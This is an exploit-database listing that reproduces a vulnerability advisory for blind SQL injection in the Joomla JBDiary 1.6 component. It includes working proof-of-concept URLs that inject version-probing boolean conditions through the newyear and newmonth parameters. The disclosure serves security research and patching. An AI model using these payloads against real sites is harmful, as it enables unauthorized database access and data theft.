header-logo
Suggest Exploit
vendor:
Joomla (JBDiary)
by:
B-HUNT3|2
5,5
CVSS
MEDIUM
SQL Injection
89
CWE
Product Name: Joomla (JBDiary)
Affected Version From: 1.6
Affected Version To: 1.6
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Demo Site
N/A

Joomla (JBDiary) BLIND SQL Injection Vulnerabilities

Multiple input vars are vulnerable to SQL code injection. Proofs of concept are provided in the text, which demonstrate how to execute arbitrary SQL queries.

Mitigation:

Input validation and sanitization should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

[~]>> ...[BEGIN ADVISORY]...

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> TITLE: Joomla (JBDiary) BLIND SQL Injection Vulnerabilities 
[~]>> LANGUAGE: PHP
[~]>> DORK: N/A
[~]>> RESEARCHER: B-HUNT3|2
[~]>> CONTACT: bhunt3r[at_no_spam]gmail[dot_no_spam]com
[~]>> TYPE: COMMERCIAL
[~]>> PRICE: 5€
[~]>> TESTED ON: Demo Site

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> DESCRIPTION: Multiple input vars are vulnerable to SQL code injection.
[~]>> AFFECTED VERSIONS: Confirmed in 1.6 but probably other versions also. 
[~]>> RISK: High/Medium
[~]>> IMPACT: Execute Arbitrary SQL queries

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> PROOFS OF CONCEPT:

[~]>> http://server/?newyear=[SQL]&newmonth=[SQL]


[~]>> -----{VAR NEWYEAR}-----

[~]>> {RETURN TRUE}
[~]>> http://server/?newyear=2011'+and+substring(@@version,1,1)=4%23&newmonth=01 
[~]>> {RETURN FALSE}
[~]>> http://server/?newyear=2011'+and+substring(@@version,1,1)=5%23&newmonth=01

[~]>> -----{VAR NEWMONTH}-----

[~]>> {RETURN TRUE}
[~]>> http://server/?newyear=2011&newmonth=01'+and+substring(@@version,1,1)=4%23
[~]>> {RETURN FALSE}
[~]>> http://server/?newyear=2011&newmonth=01'+and+substring(@@version,1,1)=5%23

[~]>> Note: True or False is visible in calendar's colors.

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> ...[END ADVISORY]...

Navigation

Suggest Exploit

Services By CQR